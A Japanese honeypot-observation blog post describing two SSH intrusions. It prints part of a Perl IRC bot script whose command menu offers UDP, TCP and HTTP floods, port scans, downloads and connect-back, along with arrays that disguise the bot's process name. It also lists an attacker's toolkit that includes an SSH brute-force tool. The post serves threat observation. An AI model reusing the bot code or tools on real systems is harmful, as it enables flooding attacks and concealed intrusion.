夏休みの宿題?SSH不正侵入、観察日記 Vol.2
アメリカ合衆国(US)から不正アクセスを観測したのでご紹介。
今回も、動画を見ていただこう。
![[cowrie_log.gif]](/2015/07/SSH不正侵入、観察日記-Vol-2/cowrie_log.gif "[cowrie_log.gif]")
last コマンドをタイポしたあと、なにやらファイルをダウンロードして実行して去っていった。
実行しようとしたファイルの一部がこちら。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
|
###
## [ Channel ] ###
## !u @join <#channel> ## !u @udp1 <ip> <port> <time> ## !u @cback <ip> <port> ##
## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## !u @downlod <url+path> <file> ##
## !u !uejoin <#channel> ## !u @udp3 <ip> <port> <time> ## !u @portscan <ip> ##
## !u !op <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> ##
## !u !deop <channel> <nick> ## !u @http <site> <time> ## <recipient> <message> ##
## !u !voice <channel> <nick> ## ## !u pwd;uname -a;id <for example> ##
## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## !u @port <ip> <port> ##
## !u !nick <newnick> ## !u @msgflood <nick> ## !u @dns <ip/host> ##
## !u !msg <nick> ## !u @noticeflood <nick> ## ##
## !u !quit ## ## ##
## !u !uaw ## ## ##
## !u @die ## ## ##
## ## ## ##
###
###
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"/usr/sbin/sshd -i",
"/usr/sbin/sshd",
"/usr/sbin/sshd -D",
"/usr/sbin/apache2 -k start",
"/sbin/syslogd",
"/sbin/klogd -c 1 -x -x",
"/usr/sbin/acpid",
"/usr/sbin/cron");
my $process = $rps[rand scalar @rps];
my @rversion = ("\001VERSION - unknown command.\001",
"\001mIRC v5.91 K.Mardam-Bey\001",
"\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001",
"\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001",
"\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001",
"\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001mIRC v6.31 Khaled Mardam-Bey\001",
"\001mIRC v7.15 Khaled Mardam-Bey\001");
my $vers = $rversion[rand scalar @rversion];
|
perl製のスクリプトで、前回と同じ、IRCBOTだった。 もちろんプロセス名は偽装して実行されるプログラムだった。
もう一つご紹介!
夏休みスペシャルということで、もう一つご紹介。
今回はルーマニアからの不正アクセスを観察してみよう。
手馴れたもので、wgetするURLを手打ちしている模様。
rzv.tgz を解凍したあと、何やらスクリプトを実行している。
解凍後のファイルの中身はこちら。
1
2
3
4
5
6
7
8
| $ ls -l
合計 4100
-rwxr-xr-x 1 561 561 3814 12月 15 2014 mass
-rwxr-xr-x 1 561 561 1268571 12月 20 2013 pscan
-rwxr-xr-x 1 561 561 234 12月 15 2014 random
-rwxr-xr-x 1 561 561 300 12月 15 2014 scan
-rwxr-xr-x 1 561 561 302240 10月 18 2002 screen
-rwxr-xr-x 1 561 561 2612509 12月 20 2013 ssh2
|
それぞれのファイルタイプはこんな感じ。
1
2
3
4
5
6
| mass: ASCII text
pscan: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
random: Bourne-Again shell script, ASCII text executable
scan: Bourne-Again shell script, ASCII text executable
screen: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, stripped
ssh2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
|
ssh2の中身をstringsで見たところ、ssh2のブルートフォースアタックツールのようだった。
1
2
3
4
| [1;37m@SSH2 Bruteforce v2.2 @ 2014!
[1;37m-> by
[01;33mlan.tester@yahoo.com
[1;37m-> E-mail us for support or if you want to make a donation !
|